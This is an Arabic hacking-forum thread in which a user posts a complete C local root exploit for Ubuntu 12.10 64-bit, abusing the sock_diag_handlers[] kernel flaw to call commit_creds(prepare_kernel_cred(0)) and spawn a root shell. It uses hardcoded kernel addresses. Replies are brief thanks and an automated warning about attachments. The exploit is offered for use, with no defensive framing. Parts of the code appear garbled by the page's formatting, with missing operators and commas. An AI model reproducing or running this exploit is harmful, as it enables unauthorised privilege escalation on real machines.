الوسوم:
حالة الموضوع:
مغلق
  1. Scorpion

    Scorpion Developer

    الأنتساب:
    ‏15 يونيو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    DZ
    Welcome to all members IQ-TEAM
    Local Root exploit for Ubuntu 12.10 64bit that leverages the sock_diag_handlers[]
    vulnerability in Linux kernels before 3.7.10.
    كود PHP:
    #include <unistd.h>
    #include <sys/socket.h>
    #include <linux/netlink.h>
    #include <netinet/tcp.h>
    #include <errno.h>
    #include <linux/if.h>
    #include <linux/filter.h>
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <linux/sock_diag.h>
    #include <linux/inet_diag.h>
    #include <linux/unix_diag.h>
    #include <sys/mman.h>

    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;
    unsigned long sock_diag_handlersnl_table;

    int __attribute__((regparm(3)))
    x()
    {
      
    commit_creds(prepare_kernel_cred(0));
      return -
    1;
    }

    char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    int main() {
      
    int fd;
        
    unsigned long mmap_startmmap_size 0x10000;
      
    unsigned family;
      
    struct {
        
    struct nlmsghdr nlh;
        
    struct unix_diag_req r;
      } 
    req;
      
    char  buf[8192];

      if ((
    fd socket(AF_NETLINKSOCK_RAWNETLINK_SOCK_DIAG)) < 0){
        
    printf("Can't create sock diag socket\n");
        return -
    1;
      }

      
    memset(&req0sizeof(req));
      
    req.nlh.nlmsg_len sizeof(req);
      
    req.nlh.nlmsg_type SOCK_DIAG_BY_FAMILY;
      
    req.nlh.nlmsg_flags NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
      
    req.nlh.nlmsg_seq 123456;

      
    req.r.udiag_states = -1;
      
    req.r.udiag_show UDIAG_SHOW_NAME UDIAG_SHOW_PEER UDIAG_SHOW_RQLEN;

      
    /* Ubuntu 12.10 x86_64 */
      
    req.r.sdiag_family 0x37;
      
    commit_creds = (_commit_creds0xffffffff8107d180;
      
    prepare_kernel_cred = (_prepare_kernel_cred0xffffffff8107d410;
        
    mmap_start 0x1a000;

        if (
    mmap((void*)mmap_startmmap_sizePROT_READ|PROT_WRITE|PROT_EXEC,
        
    MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -10) == MAP_FAILED) {

        
    printf("mmap fault\n");
        exit(
    1);
        }

        *(
    unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
        
    memset((void *)mmap_start0x90mmap_size);
        
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1sizeof(stage1));

      
    send(fd, &reqsizeof(req), 0);
      if(!
    getuid())
        
    system("/bin/sh");
    }
     

    الملفات المرفقة:

    • ubuntu.txt
      حجم الملف:
      2 ك. ب
      المشاهدات:
      0
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. Ṁŕ Ĕĺ Ķińĝ

    Ṁŕ Ĕĺ Ķińĝ Developer

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    47
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    [̲̅E][̲̅G][̲̅Y][̲̅P][̲̅T]
    رد: Ubuntu 12.10 64bit Local Root

    يعطيك العآفية يـ بطل , دمت بخير
     
  4. ÍяâΘ

    ÍяâΘ Developer

    الأنتساب:
    ‏30 نوفمبر 2012
    المشاركات:
    63
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ÍŕÁΘ
    رد: Ubuntu 12.10 64bit Local Root

    وِعليّكم آلسًسًسًلآم وِرحًمة ٱللۂ وِبّركـآتُۂ

    يّعطٌيّك آلعـآفُيّۂ آخٌيّ

    فُيّ آمـآنٌ ٱللۂ
    :{12}: ​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة